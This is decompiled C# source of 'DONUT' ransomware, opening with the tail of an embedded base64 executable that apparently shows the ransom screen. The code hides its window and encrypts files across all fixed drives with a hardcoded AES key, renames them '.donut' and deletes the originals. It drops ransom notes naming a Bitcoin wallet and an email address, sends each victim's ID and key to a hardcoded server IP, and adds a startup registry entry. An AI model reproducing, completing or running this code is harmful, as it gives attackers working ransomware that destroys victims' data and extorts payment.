AB0AG8AIABvAHUAcgAgAGUAbQBhAGkAbAAgAC0AIABkAG8AbgB1AHQAbQBtAG0AIABAAHQAdQB0AGEAbgBvAHQAYQAuAGMAbwBtAAoAYQBuAGQAIAB0AGUAbABsACAAdQBzACAAeQBvAHUAcgAgAHUAbgBpAHEAdQBlACAASQBEACAAYQBuAGQAIABCAGkAdABDAG8AaQBuACAAdAByAGEAbgBzAGEAYwB0AGkAbwBuAC4AASNZAG8AdQByACAAVQBuAGkAcQAgAEkARAAgAGkAcwA6ACAAAG0KAEIAaQB0AEMAbwBpAG4AIAB3AGEAbABsAGUAdAAgAGkAcwA6ACAAMQBNAFYAQgA3AHcAYgBlAEYAMQB5AEwARwBSAEMAVQBtAFYAZABnAGkARABXAE0ARAA3AHkAUgBzAHAASgBYADgAQwAAQ2QAcgBhAHcATwBuAFMAYwByAGUAZQBuAC4AUAByAG8AcABlAHIAdABpAGUAcwAuAFIAZQBzAG8AdQByAGMAZQBzAAAAHh1xF8uM1ka/N++OYGMAgAAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBSABARE9BSACAQ4OBiABARGAoRMHCwwMDAwSWRJZElkOEl0SWRFhCQAEEYCtCAgICAYgAQERgK0FAAARgK0KIAUBEoCBDAwMDAggAwEODBGAsQUgAgEMDAsgBAEOEl0SgIERYQYgAQERgLUDIAAIBgABEoC9GAYgAQESgL0EBwERbQUAABKAwQQgABFtBSACAQgIBiABARGAxQYHAhJVEW0EIAASVQQgAQEMBSABARJNBSACARwYBiABARKA0QYgAQERgNUGIAEBEYDdBiABARGA4QQgAQENBiABARKA5QgHBBJVDhJ9CAQAAQgICCADAQgIEYDxBwABElUSgPUFAAASgIEKIAUBEoCBCAgICAMAAA4FAAIODg4FAAASgQEHIAIBDhKBAQMGEn0GIAISfQ4CAyAADgUgAgEOHAoHBA4SXRKAgRFhBAcBElUMIAUBDgwRgLERgQ0FBSABARJdBSAAEoERBiABARKAuQYgAQERgRUFAAASgRkGAAMODg4OAwAAAQQAAQECBQABARJJCAABEoElEYEpBSAAEoEtByACAQ4SgS0IAAESgTESgTEIt3pcVhk04IkIsD9ffxHVCjoEFAAAAAQBAAAABAIAAAAEAAAAAICeLgGAhFN5c3RlbS5TZWN1cml0eS5QZXJtaXNzaW9ucy5TZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORUBVAIQU2tpcFZlcmlmaWNhdGlvbgECBgwCBggDBhJNAwYSUQIGDgMGEnkEBhKAmQQGEoCdAwYSGAMGERwJAAQBDAwMEBJVCQAGGAgICAgICAYgAgEcEmkGIAIBHBJxBwAECAgIDggFAAEBERwGAAEBEBJVBQAAEoCZBQAAEoCdBgABARKAnQQAABIYBQgAEoCZBQgAEoCdBAgAEhgIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAAEQEADGRyYXdPblNjcmVlbgAABQEAAAAAFwEAEkNvcHlyaWdodCDCqSAgMjAxOAAAKQEAJDcwNmRlOGJmLWQ1ODgtNGY4OC1hMWQzLTlhNzk1MGM3YWIwZgAADAEABzEuMC4wLjAAAEEBADNTeXN0ZW0uUmVzb3VyY2VzLlRvb2xzLlN0cm9uZ2x5VHlwZWRSZXNvdXJjZUJ1aWxkZXIIMTUuMC4wLjAAAFkBAEtNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLkVkaXRvcnMuU2V0dGluZ3NEZXNpZ25lci5TZXR0aW5nc1NpbmdsZUZpbGVHZW5lcmF0b3IIMTEuMC4wLjAAAAAAtAAAAM7K774BAAAAkQAAAGxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlUmVhZGVyLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkjU3lzdGVtLlJlc291cmNlcy5SdW50aW1lUmVzb3VyY2VTZXQCAAAAAAAAAAAAAABQQURQQURQtAAAALQAAADOyu++AQAAAJEAAABsU3lzdGVtLlJlc291cmNlcy5SZXNvdXJjZVJlYWRlciwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb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";

	public static string string1 = "Hi.\n\rAll your files have been ENCRYPTED by DONUT Ransomware.\n\rDo you want to restore your files?\n\rYour should buy DonutDecryptor.\n\r";

	public static string string2 = "Current Price $100.\n\r";

	public static string string3 = "For payment your need cryptocurrency BitCoin.\n\rWrite to our email - donutmmm @tutanota.com\n\rand tell us your unique ID and BitCoin transaction.\n\r";

	public static string string4 = "Your Uniq ID is: " + AppDomain.CurrentDomain.FriendlyName + "\nBitCoin wallet is: 1MVB7wbeF1yLGRCUmVdgiDWMD7yRspJX8C";

	public static string decryptLandingStr = string3;

	public static string[] target_extensions = null;

	private static Rijndael rijndaelAlg;

	private static byte[] x1 = new byte[32]
	{
		213, 142, 67, 93, 55, 16, 117, 84, 91, 37,
		121, 212, 163, 4, 93, 6, 41, 22, 53, 74,
		125, 63, 75, 28, 79, 101, 141, 124, 18, 154,
		225, 214
	};

	private static byte[] y1 = new byte[16]
	{
		225, 201, 23, 144, 52, 67, 178, 45, 59, 31,
		113, 132, 103, 49, 125, 146
	};

	public static string landingPath = "c:\\TEMP\\donut.exe";

	public static string donut_key = "afkshdjfgawgefuyagusgf324jfhak";

	public static string donut_id = "unknown";

	public static int blockSize = 256;

	private IContainer components;

	public static void cryptInit()
	{
		rijndaelAlg = Rijndael.Create();
		rijndaelAlg.KeySize = 256;
		rijndaelAlg.BlockSize = 128;
		rijndaelAlg.Padding = PaddingMode.None;
		rijndaelAlg.Mode = CipherMode.CBC;
	}

	public static Exception insertData(string pc_id, string pc_key, string win_ver)
	{
		Exception result = null;
		try
		{
			string address = "http://88.99.48.80/donut/client.php";
			using WebClient webClient = new WebClient();
			NameValueCollection nameValueCollection = new NameValueCollection();
			nameValueCollection.Add("pc_id", pc_id);
			nameValueCollection.Add("pc_key", pc_key);
			nameValueCollection.Add("win_ver", win_ver);
			byte[] array = webClient.UploadValues(address, nameValueCollection);
			if (array.Length == 2)
			{
				return new Exception("ok");
			}
			Encoding.UTF8.GetString(array);
			return result;
		}
		catch (Exception result2)
		{
			return result2;
		}
	}

	public static void setKey(string key)
	{
		Encoding.GetEncoding(1251).GetBytes(key);
		int num = rijndaelAlg.KeySize / 8;
		for (int i = 0; i < num; i++)
		{
			x1[i] = (byte)key[i % key.Length];
		}
		rijndaelAlg.Key = x1;
	}

	private static void SetStartup(string path)
	{
		Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", writable: true)!.SetValue("donut.exe", path);
	}

	public Form1()
	{
		InitializeComponent();
		((Control)this).Hide();
		((Form)this).set_ShowInTaskbar(false);
		cryptInit();
		LiveFileSysEncrypt();
		Process.Start(landingPath);
	}

	public static void GetDriveLetters(ref List<string> drives)
	{
		DriveInfo[] drives2 = DriveInfo.GetDrives();
		drives = new List<string>();
		DriveInfo[] array = drives2;
		foreach (DriveInfo driveInfo in array)
		{
			if (driveInfo.DriveType == DriveType.Fixed)
			{
				drives.Add(driveInfo.RootDirectory.FullName);
			}
		}
	}

	public static Exception donutRenameFile(string fname)
	{
		Exception result = null;
		try
		{
			File.Move(fname, fname + ".donut");
			return result;
		}
		catch (Exception result2)
		{
			return result2;
		}
	}

	public static bool checkStopList(string path)
	{
		bool result = true;
		path.ToLower();
		int num = 0;
		while (true)
		{
			if (num < stop_list_files.Length)
			{
				if (path.ToLower().IndexOf(stop_list_files[num].ToLower()) > 0)
				{
					break;
				}
				num++;
				continue;
			}
			int num2 = 0;
			while (true)
			{
				if (num2 < stop_list_path.Length)
				{
					if (path.ToLower().IndexOf(stop_list_path[num2].ToLower()) > 0)
					{
						break;
					}
					num2++;
					continue;
				}
				return result;
			}
			return false;
		}
		return false;
	}

	private static void cryptFileThread(object obj)
	{
		try
		{
			string obj2 = (string)obj;
			enCrytp(obj2, obj2 + ".donut");
			File.Delete(obj2);
		}
		catch (Exception)
		{
		}
	}

	public static void cryptDrive(string path)
	{
		try
		{
			string[] files = Directory.GetFiles(path);
			int num = 0;
			for (int i = 0; i < files.Length; i++)
			{
				if (checkStopList(files[i]))
				{
					string value = Path.GetExtension(files[i])!.ToLower();
					if (extensions_target.IndexOf(value) > 0)
					{
						num++;
						new Thread(cryptFileThread).Start(files[i]);
					}
				}
			}
			if (num > 0)
			{
				try
				{
					File.WriteAllText(Path.Combine(path, "decrypt.txt"), decryptLandingStr);
				}
				catch (Exception)
				{
				}
			}
			string[] directories = Directory.GetDirectories(path);
			for (int j = 0; j < directories.Length; j++)
			{
				if (checkStopList(directories[j]))
				{
					cryptDrive(directories[j]);
				}
			}
		}
		catch (Exception)
		{
		}
	}

	public static void sendInfoThread()
	{
		try
		{
			string win_ver = Environment.OSVersion.Version.ToString();
			int num = 0;
			while (num < 10 && !(insertData(donut_id, donut_key, win_ver).Message == "ok"))
			{
				Thread.Sleep(1000);
			}
		}
		catch (Exception)
		{
		}
	}

	public static void writeLanding()
	{
		byte[] bytes = Convert.FromBase64String(landingStr);
		File.WriteAllBytes(landingPath, bytes);
	}

	public static void LiveFileSysEncrypt()
	{
		try
		{
			List<string> drives = null;
			GetDriveLetters(ref drives);
			donut_key = GenerateCoupon(32, Guid.NewGuid().GetHashCode());
			donut_id = GenerateCoupon(32, Guid.NewGuid().GetHashCode());
			landingPath = Path.Combine(Path.GetTempPath(), donut_id.ToString() + ".exe");
			string4 = "Your Uniq ID is: " + donut_id + "\nBitCoin wallet is: 1MVB7wbeF1yLGRCUmVdgiDWMD7yRspJX8C";
			decryptLandingStr = string1 + string2 + string3 + string4;
			try
			{
				writeLanding();
			}
			catch (Exception)
			{
			}
			try
			{
				SetStartup(landingPath);
			}
			catch (Exception)
			{
			}
			new Thread(sendInfoThread).Start();
			setKey(donut_key);
			for (int i = 0; i < drives.Count; i++)
			{
				cryptDrive(drives[i]);
			}
		}
		catch (Exception)
		{
		}
	}

	public static string GenerateCoupon(int length, int seed)
	{
		Random random = new Random(seed);
		string text = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
		StringBuilder stringBuilder = new StringBuilder(length);
		for (int i = 0; i < length; i++)
		{
			stringBuilder.Append(text[random.Next(text.Length)]);
		}
		return stringBuilder.ToString();
	}

	public static void enCrytp(string sourceFName, string outFName)
	{
		int num = 0;
		BinaryWriter binaryWriter = new BinaryWriter(File.Open(outFName, FileMode.Create));
		BinaryReader binaryReader = new BinaryReader(File.Open(sourceFName, FileMode.Open));
		rijndaelAlg.Key = x1;
		rijndaelAlg.IV = y1;
		MemoryStream memoryStream = new MemoryStream();
		CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelAlg.CreateEncryptor(), CryptoStreamMode.Write);
		byte[] buffer = new byte[blockSize];
		while (binaryReader.BaseStream.Position < binaryReader.BaseStream.Length)
		{
			num = binaryReader.Read(buffer, 0, blockSize);
			cryptoStream.Write(buffer, 0, blockSize);
			byte[] buffer2 = memoryStream.ToArray();
			binaryWriter.Write(buffer2, 0, blockSize);
			memoryStream.Flush();
			cryptoStream.Flush();
			memoryStream.Seek(0L, SeekOrigin.Begin);
			if (num < blockSize)
			{
				break;
			}
		}
		binaryWriter.Write(Convert.ToByte(blockSize - num));
		cryptoStream.Close();
		binaryReader.Close();
		binaryWriter.Close();
	}

	private void richTextBox1_TextChanged(object sender, EventArgs e)
	{
	}

	protected override void Dispose(bool disposing)
	{
		if (disposing && components != null)
		{
			components.Dispose();
		}
		((Form)this).Dispose(disposing);
	}

	private void InitializeComponent()
	{
		((Control)this).SuspendLayout();
		((ContainerControl)this).set_AutoScaleDimensions(new SizeF(12f, 25f));
		((ContainerControl)this).set_AutoScaleMode((AutoScaleMode)1);
		((Form)this).set_ClientSize(new Size(168, 162));
		((Form)this).set_FormBorderStyle((FormBorderStyle)0);
		((Control)this).set_Name("Form1");
		((Form)this).set_StartPosition((FormStartPosition)1);
		((Control)this).set_Text("Form1");
		((Form)this).set_WindowState((FormWindowState)1);
		((Control)this).ResumeLayout(false);
	}
}
